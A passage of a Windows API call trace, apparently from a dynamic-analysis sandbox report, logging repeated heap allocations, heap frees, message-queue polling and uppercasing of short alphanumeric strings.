wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.047] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.048] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.048] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0258.049] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.049] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.050] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0258.050] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0258.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0258.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0258.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0258.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa60 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.053] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.053] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.054] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.054] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.055] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.056] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0258.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.057] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0258.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.058] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.058] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa550 [0258.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.058] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 